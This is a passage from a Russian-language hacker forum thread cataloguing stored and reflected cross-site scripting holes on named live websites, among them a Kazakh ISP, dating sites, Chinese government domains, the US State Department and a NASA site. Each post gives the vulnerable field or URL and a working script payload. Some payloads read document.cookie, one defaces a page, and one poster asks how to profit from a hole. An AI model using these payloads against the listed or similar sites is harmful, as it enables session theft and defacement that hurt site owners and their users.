Хранимые XSS

Discussion in 'Уязвимости' started by +toxa+, 18 Mar 2007.

  1. pleze

    pleze New Member

    Joined:
    30 Jul 2010
    Messages:
    35
    Likes Received:
    0
    Reputations:
    0
    http://sprashivai.ru

    Заходим на страницу регистрации
    В поле Имя пользователя вводим
    Code:
    <script>alert('xss')</script>
    И воля! :)
     
  2. Sth

    Sth New Member

    Joined:
    25 Aug 2010
    Messages:
    6
    Likes Received:
    1
    Reputations:
    5
    megaline.kz - крупнейший казахстанский провайдер.

    photo.megaline.kz - в форме регестрации вписываем
    Code:
    ><script>alert('alert')</script>
    Любуемся =)

    //зы нашёл ещё вчера, но тут зарегался только седьня.
     
    #382 Sth, 26 Aug 2010
    Last edited: 27 Apr 2017
    1 person likes this.
  3. Dima X

    Dima X Member

    Joined:
    14 Dec 2008
    Messages:
    37
    Likes Received:
    13
    Reputations:
    0
    http://universant.vov.ru/php4/love/anketa.phtml?id=3522

    Уязвимое поле

    Место работы
    Добавьте другое место работы, если его еще нет в списке
     
  4. Dima X

    Dima X Member

    Joined:
    14 Dec 2008
    Messages:
    37
    Likes Received:
    13
    Reputations:
    0
    http://universant.vov.ru/ вот сайт, ссылка "Регистрация"

    И это и предыдущая ссылка проверены.
     
  5. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    U.S Department of State
    не активка =(( но сайт знаменитость..

    http://travel.state.gov/search/search_4654.html
    вписываем:
    Code:
    [SIZE=1]<script>document.body.innerHTML ="<style>body{ visibility:hidden; }</style><div style =visibility:visible;><img src= https://forum.antichat.ru/antichat/pic/logo.gif></img></div></script>[/SIZE]
     
    2 people like this.
  6. zlo12

    zlo12 Elder - Старейшина

    Joined:
    28 Dec 2007
    Messages:
    535
    Likes Received:
    134
    Reputations:
    34
    www.peoples.ru
    Активная xss в названии темы на доске объявлений
    Code:
    Пример:
    <script>alert(1)</script>
    http://www.peoples.ru/in/board_messages.php
    
     
  7. lukmus

    lukmus Elder - Старейшина

    Joined:
    18 Nov 2009
    Messages:
    358
    Likes Received:
    115
    Reputations:
    23
    такая же фигня в ссылках, в теме и теле +
    Code:
    http://www.peoples.ru/search/?name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
     
  8. zlo12

    zlo12 Elder - Старейшина

    Joined:
    28 Dec 2007
    Messages:
    535
    Likes Received:
    134
    Reputations:
    34
    http://market.ya1.ru/
    Активная XSS в тексте объявления
    Code:
    <script>alert(1)</script>
    --
    пассивки
    http://www.almaz-antey.ru/news.php?srch=%3Cscript%3Ealert(1)%3C/script%3E
    Code:
    http://www.fototraveller.ru/news/news.php
    ><script>alert(1)</script>
    http://www.nne.ru/search.php?text=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&imageField.x=12&imageField.y=12
    http://www.vokrug.tv/search/?q=%3Cscript%3Ealert%281%29%3C%2Fscript%3E
     
    #388 zlo12, 23 Sep 2010
    Last edited: 23 Sep 2010
    1 person likes this.
  9. zlo12

    zlo12 Elder - Старейшина

    Joined:
    28 Dec 2007
    Messages:
    535
    Likes Received:
    134
    Reputations:
    34
    www.animecouncil.net
    активная xss в комментариях к новости в поле " Your name "
    Code:
    пример
    <script>alert(1)</script>
    http://www.animecouncil.net/news.php?id=168
    --
    пассивки в поиске
    http://www.arip.co.th/
    http://fullrshare.com/
     
  10. zlo12

    zlo12 Elder - Старейшина

    Joined:
    28 Dec 2007
    Messages:
    535
    Likes Received:
    134
    Reputations:
    34
    http://www.alexbriffett.com
    Активная xss в поле "Your name"
    Code:
    пример
    <script>alert(1)</script>
    http://www.alexbriffett.com/image?id=11&t=image
    --
    пассивки в поиске
    <script>alert(1)</script>
    http://www.downarchive.com/

    ><script>alert(1)</script>
    http://ads.lzjl.com/newServing/yesupSearch/image.php
     
  11. zlo12

    zlo12 Elder - Старейшина

    Joined:
    28 Dec 2007
    Messages:
    535
    Likes Received:
    134
    Reputations:
    34
    http://www.utworzspotkanie.pl/
    http://www.enotatka.pl/
    http://www.webgallery.za.pl/

    по ходу одно и то же
    Активная XSS в комментариях к фото
    Code:
    пример
    <script>alert(1)</script>
    http://www.utworzspotkanie.pl/photo.php?id=27
    ========================================
    пассивки в китайском поиске

    http://www.carnets.cn/
    http://www.hr.gov.cn/
    http://www.dangxiao.henan.gov.cn/
    http://www.yugaopian.com/
     
    #391 zlo12, 2 Oct 2010
    Last edited: 2 Oct 2010
    2 people like this.
  12. <Cyber-punk>

    <Cyber-punk> Smash the Stack

    Joined:
    1 Oct 2009
    Messages:
    658
    Likes Received:
    315
    Reputations:
    430
    http://www.dosug.cz/servlet/ru/recover

    Вводим:
    http://www.cadebou.pp.ru/ru/gb.php
    http://www.laspodmoga.ru/gb.php


    При ответе уязвимы все поля, кроме каптчи:

     
    _________________________
    #392 <Cyber-punk>, 30 Oct 2010
    Last edited: 30 Oct 2010
  13. Jokerll

    Jokerll New Member

    Joined:
    11 Nov 2010
    Messages:
    8
    Likes Received:
    0
    Reputations:
    0
    http://www.a1tv.ru/msearch/?&o=
    вводим
    Code:
    "><script>alert(/Xss by Jokerll/)</script>
    Выходит -
    http://www.a1tv.ru/msearch/?&o="><script>alert(/Xss by Jokerll/)</script>
     
  14. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    nasa в паб. http://buzzroom.nasa.gov/
    там где написано "What's Happening?" меняем на:
    "><ScRipT>alert(document.cookie)</ScRipT>
     
    #394 Дирижабль, 13 Nov 2010
    Last edited: 13 Nov 2010
    2 people like this.
  15. warzi

    warzi New Member

    Joined:
    13 Nov 2010
    Messages:
    10
    Likes Received:
    2
    Reputations:
    0
    mylove.ru активка в поле "интересы" в анкете ( а также в остальных полях там же). Не фильтруется вообще ничего, любой хтмл код лезет
    Code:
    Активка вида <script>alert(/1/)</script>
    т.е. не закрываем тег (иначе будет видно в панели наверху)
    Также, возможно, аналогичным образом уязвимы сайты-клоны lovegeek.ru и sex-znakomstva.tv
     
    #395 warzi, 14 Nov 2010
    Last edited: 14 Nov 2010
    1 person likes this.
  16. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    PostgreSQL Foundry

    http://pgfoundry.org/account/register.php

    уязвимы все поля регистрации

    "><script>alert()</script>

    тИЦ 170, PR-7
     
    _________________________
  17. niva622

    niva622 New Member

    Joined:
    4 Nov 2008
    Messages:
    17
    Likes Received:
    0
    Reputations:
    0
    nnhost.ru

    http://nnhost.ru/?p=5

    все поля уязвимы

    "><script>alert()</script>
     
  18. KREGI

    KREGI Banned

    Joined:
    9 Feb 2009
    Messages:
    42
    Likes Received:
    3
    Reputations:
    1
    ТИЦ 500

    http://www.indarnb.ru/add-preview/

    Уязвимы все поля

    "><script>alert(document.cookie)</script>
     
  19. MikePro

    MikePro New Member

    Joined:
    29 Jan 2010
    Messages:
    0
    Likes Received:
    0
    Reputations:
    0
    20 000 хостов, ТиЦ 275

    HTML:
    http://www.web-ip.ru/index.php?action=reg&r=1
    Втавляем
    HTML:
    "><script>alert()</script>
    в поле E-mail.

    как извлечь из этой дыры пользу не знаю :) Если есть идеи напишите плз ;)
     
  20. ubi

    ubi Elder - Старейшина

    Joined:
    25 Dec 2009
    Messages:
    308
    Likes Received:
    76
    Reputations:
    19
    http://www.it-monster.ru/register/typecandidate/

    Уязвимое поле ICQ UIN

    "><script>alert(/xss/)</script>